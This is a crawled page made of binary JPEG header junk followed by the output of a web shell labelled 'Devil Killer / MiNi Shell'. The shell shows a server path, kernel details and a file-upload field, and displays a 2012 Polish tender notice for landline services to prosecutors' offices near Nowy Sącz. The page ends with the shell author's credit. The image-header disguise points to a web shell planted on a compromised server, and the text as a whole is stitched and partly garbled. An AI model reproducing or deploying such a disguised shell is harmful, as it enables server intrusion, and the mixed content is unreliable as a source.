JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121105/233303-N-2012.html

<p class="kh_header"><b>Nowy Sącz: Świadczenie usług telefonii stacjonarnej dla prokuratur okręgu nowosądeckiego</b><br>
<b>Numer ogłoszenia: 233303 - 2012; data zamieszczenia: 05.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa w Nowym Sączu , ul. Jagiellońska 56A, 33-300 Nowy Sącz, woj. małopolskie, tel. 18 4141000, faks 18 4141006.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowy-sacz.po.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług telefonii stacjonarnej dla prokuratur okręgu nowosądeckiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług telefonii stacjonarnej na rzecz prokuratur okręgu nowosądeckiego obejmujących:
-połączenia lokalne
-połączenia międzystrefowe
-połączenia do sieci komórkowych 
-połączenia międzynarodowe
-zapewnienie transmisji dla faksu
-połączenia informacyjne - biuro numerów
Usługi powinny być świadczone zgodnie z przepisami określonymi w ustawie z dnia 16 lipca 2004r. Prawo telekomunikacyjne (Dz. Ust. z 2004 Nr 171 poz. 1800, z późn. zm. ) 

1.2.Zamówienie zostało podzielone na części:
-Część I: Świadczenie usług telekomunikacyjnych dla Prokuratury Okręgowej 
w Nowym Sączu; ul. Jagiellońska 56 a, 33-300 Nowy Sącz
-Część II: Świadczenie usług telekomunikacyjnych dla Prokuratury Rejonowej       w Gorlicach; ul. Biecka 5, 38-300 Gorlice
-Część III: Świadczenie usług telekomunikacyjnych dla Prokuratury Rejonowej      w Zakopanem; ul. ul. Gimnazjalna 13 b, 34-500 Zakopane
-Część IV: Świadczenie usług telekomunikacyjnych dla Prokuratury Rejonowej        w Muszynie; ul. Piłsudskiego 25; 33-370 Muszyna              

1.3.	Stan istniejący:

Zamawiający ma zawarte umowy na świadczenie usług telekomunikacyjnych z TP S.A. w ramach, których w danych lokalizacjach posiada: 
a)Prokuratura Okręgowa w Nowym Sączu 
-7 dostępów do  linii cyfrowych ISDN (2B+D) z usługą DDI (Direct Dial - In - 
w ilości 70 numerów DDI), wraz z usługą prezentacji numeru (CLIP).                   Numery używane przez Zamawiającego: 184141000, 184141009, 184141018, 184141028, 184141038, 184141048, 184141058 (numeracja DDI od 184141000 do 184141069)
-3 dostępy do linii cyfrowych ISDN (2B+D).
 Numery używane przez Zamawiającego: 184400714, 184490570, 184777651 
-1 łącze analogowe, numer używany przez Zamawiającego: 184423722

b)Prokuratura Rejonowa w Gorlicach 
-2 dostępy do  linii cyfrowych ISDN (2B+D) z usługą DDI (Direct Dial - In - 
w ilości 20 numerów DDI), wraz z usługą prezentacji numeru (CLIP).                     Numery używane przez Zamawiającego 183535554, 183535654 (numeracja DDI  od 183551160 do 183551179)
-1 łącze analogowe, numer używany przez Zamawiającego:  183522899

c)Prokuratura Rejonowa w Zakopanem 
-2 dostępy do  linii cyfrowych ISDN (2B+D) z usługą DDI (Direct Dial - In - 
w ilości 20 numerów DDI), wraz z usługą prezentacji numeru (CLIP).                     Numery używane przez Zamawiającego 182024710, 182024730 (numeracja DDI      od 182024720 do 182024739)
-1 łącze analogowe, numer używany przez Zamawiającego:  182068214

d)Prokuratura Rejonowa w Muszynie
-1 dostęp do  linii cyfrowych ISDN (2B+D) z usługą DDI (Direct Dial - In - 
w ilości 13 numerów DDI), wraz z usługą prezentacji numeru (CLIP).                      Numer używany przez Zamawiającego 184710610 (numeracja DDI od 184710610 do 18410623)
-3 łącza analogowe, numery używany przez Zamawiającego:  184714595, 184714893, 184714950

W podanych lokalizacjach w oparciu o łącza analogowe realizowany jest dostęp do Internetu.

1.3 Struktura połączeń: 
a)Prokuratura Okręgowa w Nowym Sączu 
-Połączenia lokalne -  średnio 2350 połączenia m-c; 4000 min m-c 
-Połączenia międzystrefowe - średnio 700 połączeń; 1600  min m-c
-Połączenia do sieci komórkowych- średnio 1100 połączeń; 1850 min m-c 
b)Prokuratura Rejonowa w Gorlicach 
-Połączenia lokalne -  średnio 650 połączeń m-c; 1200 min m-c 
-Połączenia międzystrefowe - średnio 120 połączeń; 370  min m-c
-Połączenia do sieci komórkowych - średnio 70 połączeń; 130 min m-c 
c)Prokuratura Rejonowa w Zakopanem 
-Połączenia lokalne -  średnio 600 połączeń m-c; 1100 min m-c 
-Połączenia międzystrefowe - średnio 100 połączeń; 220  min m-c
-Połączenia do sieci komórkowych- średnio 250 połączeń; 350 min m-c
d)Prokuratura Rejonowa w Muszynie
-Połączenia lokalne -  średnio 450 połączeń m-c; 570 min m-c 
-Połączenia międzystrefowe - średnio 60 połączeń; 100  min m-c
-Połączenia do sieci komórkowych- średnio 100 połączeń; 150 min m-c 

(wykaz minut połączeń komórkowych określono wg. średniej miesięcznej liczby wykonanych połączeń i Wykonawca w formularzu ofertowym - załącznik nr 1 winien określić średnie ceny usług rozmów komórkowych)
	
1.4.Założenia dla nowych umów:
-świadczenie usług w zakresie określonym w pkt 1.1., 
-podtrzymanie obecnie użytkowanych łączy telekomunikacyjnych w zakresie określonym w pkt. 1.2 (a-c).
-w lokalizacji określonej w pkt 1.2 (d) utrzymanie 1 łącza ISDN (2B+D) o numerze 184710610 i 1 łącza analogowego o numerze 184714950. Zamiana łącza analogowego 184714595 na łącze cyfrowe ISDN (2B+D). Rezygnacja z łącza analogowego o numerze 184714893. W oparciu o dwie linie ISDN uruchomienie usługi DDI z minimum 20 numerami z zachowaniem dotychczasowej numeracji wraz z usługą prezentacji numeru CLIP.
-opłaty abonamentowe dla dostępów cyfrowych ISDN i łączy analogowych nie podlega zwiększeniu przez cały czas trwania umowy
-sekundowe rozliczanie czasu rozmów, bez opłaty początkowej 
-bezpłatna blokada możliwości połączeń na numery 0-40x, 0-30x i 0-70x
-utrzymanie usługi DDI (Direct Dial-In) 
-utrzymanie dotychczasowej numeracji abonenta
-zachowanie prezentacji z połączeń przychodzących (wymagany CLIP),
-realizacja połączeń w technologii komutowanej (Usługa nie może być realizowana
w technologii VIP lub drogą radiową),
-załatwienie formalności związanych z utrzymaniem aktualnie funkcjonujących usług, bez przerw w ich dostawie. 
-bezpłatna pomoc techniczna dotycząca świadczonych usług telekomunikacyjnych. Awarie i nieprawidłowości w pracy łączy będą usuwane w terminie do 24 godzin od ich zgłoszenia przez Zamawiającego lub ich wykrycia przez Wykonawcę..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.21.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten  zostanie spełniony, jeżeli Wykonawca przedstawi aktualny dokument dokumenty potwierdzające uprawnienia wykonawcy do świadczenia powszechnych usług telekomunikacyjnych wystawiony zgodnie z obowiązującymi przepisami.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca przedstawi wykaz wykonanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia ( co najmniej 2 usługi) z podaniem ich wartości oraz dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że usługi zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia  na podstawie oświadczenia - załącznik nr 3</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia  na podstawie oświadczenia - załącznik nr 3</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia  na podstawie oświadczenia - załącznik nr 3</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>załącznik nr 1 - formularz wyceny, załącznik nr 2 - formularz ofertowy, załącznik   nr 3 - Oświadczenie na treść art. 22 ust. 1 oraz art. 44</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści  złożonej oferty, na podstawie której dokonano wyboru Wykonawcy:
- w stosunku do osób - zmiany osób reprezentujących na skutek zmian organizacyjnych,
- zmiany danych adresowych - w przypadku zmiany siedziby,
- w przypadku zmiany urzędowej stawki VAT,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nowy-sacz.po.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Prokuratura Okręgowa
ul. Jagiellońska 56 a
33-300 Nowy Sącz
pok. 300.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2012 godzina 10:00, miejsce: Prokuratura Okręgowa
ul. Jagiellońska 56 a
33-300 Nowy Sącz
pok. 300.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług telekomunikacyjnych dla Prokuratury Okręgowej w Nowym Sączu; ul. Jagiellońska 56 a, 33-300 Nowy Sącz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usługi w zakresie:
-7 dostępów do  linii cyfrowych ISDN (2B+D) z usługą DDI (Direct Dial - In - 
w ilości 70 numerów DDI), wraz z usługą prezentacji numeru (CLIP).                   Numery używane przez Zamawiającego: 184141000, 184141009, 184141018, 184141028, 184141038, 184141048, 184141058 (numeracja DDI od 184141000 do 184141069)
-3 dostępy do linii cyfrowych ISDN (2B+D).
 Numery używane przez Zamawiającego: 184400714, 184490570, 184777651 
-1 łącze analogowe, numer używany przez Zamawiającego: 184423722.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 64.21.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usług telekomunikacyjnych dla Prokuratury Rejonowej w Gorlicach; ul. Biecka 5,   38-300 Gorlice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usługi w zakresie:
- 2 dostępy do  linii cyfrowych ISDN (2B+D) z usługą DDI (Direct Dial - In - 
w ilości 20 numerów DDI), wraz z usługą prezentacji numeru (CLIP).                     Numery używane przez Zamawiającego 183535554, 183535654 (numeracja DDI      od 183551160 do 183551179)
-1 łącze analogowe, numer używany przez Zamawiającego:  183522899.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 64.21.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie usług telekomunikacyjnych dla Prokuratury Rejonowej w Zakopanem; ul.  Gimnazjalna 13 b, 34-500 Zakopane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usługi w zakresie:
- 2 dostępy do  linii cyfrowych ISDN (2B+D) z usługą DDI (Direct Dial - In - 
w ilości 20 numerów DDI), wraz z usługą prezentacji numeru (CLIP).                     Numery używane przez Zamawiającego 182024710, 182024730 (numeracja DDI   od 182024720 do 182024739)
-1 łącze analogowe, numer używany przez Zamawiającego:  182068214.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 64.21.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Świadczenie usług telekomunikacyjnych dla Prokuratury Rejonowej w Muszynie; ul. Piłsudskiego 25; 33-370 Muszyna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usługi w zakresie:
utrzymanie 1 łącza ISDN (2B+D) o numerze 184710610 i 1 łącza analogowego o numerze 184714950. Zamiana łącza analogowego 184714595 na łącze cyfrowe ISDN (2B+D). Rezygnacja z łącza analogowego o numerze 184714893. W oparciu o dwie linie ISDN uruchomienie usługi DDI z minimum 20 numerami z zachowaniem dotychczasowej numeracji wraz z usługą prezentacji numeru CLIP..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 64.21.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com